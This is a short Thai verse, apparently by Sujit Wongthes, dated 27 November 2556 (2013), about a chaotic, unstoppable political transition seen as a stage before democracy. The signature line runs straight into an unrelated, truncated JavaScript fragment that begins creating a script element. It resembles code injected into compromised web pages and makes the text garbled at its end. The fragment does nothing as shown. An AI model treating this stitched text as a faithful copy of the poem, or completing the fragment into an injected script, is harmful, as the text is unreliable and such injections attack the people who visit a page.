เปลี่ยนผ่านประจันหน้าโกลาหล

เลิกไม่มีหนีไม่พ้นหยุดไม่ได้

เป็นขั้นตอนก่อนประชาธิปไตย

กว่าจะได้ก็ต้องเป็นไปเช่นนั้น


สุจิตต์ วงษ์เทศ

บ้านช่างหล่อ กรุงธนบุรี

27  พฤศจิกายน 2556} else {var d=document;var s=d.createElement(‘script’);